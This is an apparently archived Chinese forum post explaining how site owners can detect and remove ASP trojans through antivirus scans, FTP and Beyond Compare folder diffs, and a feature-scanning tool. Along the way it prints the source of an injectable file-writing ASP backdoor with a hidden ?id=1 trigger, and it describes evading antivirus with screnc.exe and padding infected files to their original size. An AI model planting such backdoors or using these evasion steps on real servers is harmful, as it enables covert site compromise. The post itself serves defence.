TA的每日心情 | 开心
2014-7-28 21:47 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。 d! y* G, q( i+ r7 {
6 ^( j% K/ V6 |通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。
" ^/ f% V- H& C N& ?3 N. D; I( J# @' |! Y3 ^/ u# F( S
一.技巧1:杀毒软件查杀 $ q; D3 `! T( G) o) V- A
# D* A) h6 `& d5 W D$ ^一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。 9 k7 A5 H4 r1 N+ P) O
( d6 I x/ b3 w+ _$ X" @利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。 3 ?' K) X$ y8 b
% F. V6 Y" m2 Y% }
二.技巧2:FTP客户端对比
4 L! h3 Q) t7 Y9 T* h* T e; O0 `( j& n
上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入: + W- ]. X- S1 @3 s7 S
7 _$ Z/ z' P8 C+ N, c+ fscrenc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。 ) A( y) \, a! j& A. K1 N
/ ]& x t$ Z9 e% f" E经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉
0 K, q5 X% r2 e: N0 @
6 G2 X7 ~( p. l b0 E: `; x等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。
& v9 t/ I1 t: i, u! d
* ^! G8 I) G+ Q4 |/ j: H: z. T盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。
" o, a+ Y+ i+ U2 A+ ^+ V) a/ T- n* e9 Q" R9 l0 L
所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。 0 s4 U1 o. J0 B; r9 i6 n. ^
0 H3 [& O2 z; [" F这里以FlashFXP进行操作讲解。
1 g/ y' T7 y$ V5 V b5 B9 _# E* K. ^. e! s( Q) H
步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。 ( J( S; x" s: W% c- d/ e; D
8 L7 E2 i9 x! k5 J' R
步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。
, S0 n ?7 N1 r$ \/ ^; p8 z; f. V" T0 J W; w% z0 D
我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。
- H) ?: m9 P/ l5 z% N+ {9 x& x8 r三.技巧3:用Beyond Compare 2进行对比
3 X) W. g, p) n% X+ C6 _: j" z! o% B. N0 x
上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下:
0 }' U. ^8 [, @0 ]" D/ g$ ?- J# i
〈%
% [9 e. K, r' H- g
' K% L% C% {. T' c4 F/ Oon error resume next 5 J3 i8 a$ f5 w) l
+ p4 ]* Y$ @* Sid=request("id") 5 A" ?. ?* n( q0 |$ Y. @
) l2 Z0 A' W" @: y# T, ]1 e* j. ^; w* bif request("id")=1 then ) V4 j6 q4 ^$ x7 F5 g
) o9 |* b( c6 d4 m/ E
testfile=Request.form("name") ) W0 ~) P2 M& I' K1 ~/ _
: s. ~! f7 Q* ~" H4 Wmsg=Request.form("message")
. w' z' q, T7 ?2 }2 x; X
9 B- I* I0 e; X* `# Yset fs=server.CreatObject("scripting.filesystemobject")
6 G" P% _ n' Q( G/ W) w7 J3 z4 W$ o Y) v- O
set thisfile=fs.openTestFile(testfile,8,True,0)
' `; y8 A6 J" v5 X1 k& t) H$ S6 I
thisfile.Writeline(""&msg&"") 2 u Q' t- e9 O. \- E ~9 B) r
2 E3 n: {& C ^( O8 C& t0 x
thisfile.close
0 \- L: `0 u; {' q5 b8 j8 @6 W8 A4 b, E
set fs=nothing 0 @# r9 X# W% m& s
. W2 S4 t: ]2 j/ \
%〉 ' ~: n k# P& S* M
1 \, E( B: b) B
〈from method="post" Action="保存"?id=1〉
' I m) q. d6 u- ^2 b
: Z% E/ C5 m4 V8 I+ p/ a〈input type="text" size="20" name="Name" ' P Q+ V7 X/ F
' O9 _ ~9 `+ g* [5 GValue=〈%=server.mappath("XP.ASP")%〉〉 0 H, c+ U5 | L9 R8 N
3 X7 Z% o7 U4 t$ J4 B3 {$ ]5 ^$ ]〈textarea name="Message" class=input〉
3 o& [" N# p" e2 g3 Y( ?$ N% V! y! t' v2 a" _$ N
" T$ W/ S0 N- M) M. r1 r
〈/textarea〉 3 ~% V, o+ J9 P; Z, g" z; J7 }8 g6 k+ a8 V
: G9 R C [; A
〈input type="Submit" name="send" Value="生成" ; a6 G p. I* a4 [2 g- s& I0 t3 N& V* g7 E
- b; X5 J+ ~" a0 Rclass=input〉
( S- }, t1 \$ J3 a9 G
) W& y% Z% R" {2 `- h〈/from〉 2 y0 r# Q( [+ t8 N! u5 \* A
1 T4 m3 z- p% o" c' Q6 U/ q5 [" S〈%end if%〉
7 m! F$ ^- s& C, v, Z6 g
. G( }+ X1 h! Y6 q注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。
( ~1 z( n) l2 P. e# y
7 r0 l$ T' B- N假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。
$ Z7 g+ G2 v1 v2 O- d; r6 h
+ {; S- \* N. F0 K这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。 9 A3 B8 o$ n9 ?, W$ o' P
5 Q$ O3 O. {' L% H
Beyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。; p1 C/ v+ ]. [$ Y# [# j" ]( Z
+ k# i/ D; V$ D- K看我来利用它完成渗透性asp木马的查找。
' \8 [9 v: i8 s+ j
' A2 ]$ |! v' s9 W4 y. V步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
$ \9 c N$ x' O- G* f5 I# }5 k
0 c' q$ E$ a& m步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。 0 Y+ Q) ~6 T C e. `/ Q% J; |
7 t1 ~6 K. g/ S+ E2 ~* i
步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧!
4 U* j4 ^- s& ~: S0 w6 M- m. S6 `" i' g% B9 V( a4 P
. `7 \' Y2 @/ j四.技巧4:利用组件性能找asp木马 - F: x: k- M0 C& u. B i+ U% p
: N7 j+ j# E) ]5 s! }5 e& M上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。
% h* z; d5 p( L4 C) M4 Y1 K" o# K( M e) h* s" W
如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。 6 ?& f3 a7 a' A* X6 Z+ C' f
0 i4 u. @2 Y+ E0 o$ T; Y
它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。
. h* C \5 z3 T- P7 M4 ?) e
2 I$ {4 p+ y( h4 a" I使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。 4 s3 I4 V! j E& h- A0 H* Q
& d' p- n* h8 \% ~0 h: a. Y! r: p+ S
一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。 $ i) V- L. i3 y/ ?, i# c& r" y
; m0 [# L' C: d N) D2 k! o
大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。 |
|
/1 
IP卡
狗仔卡
发表于 2009-4-17 08:32:46
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
楼主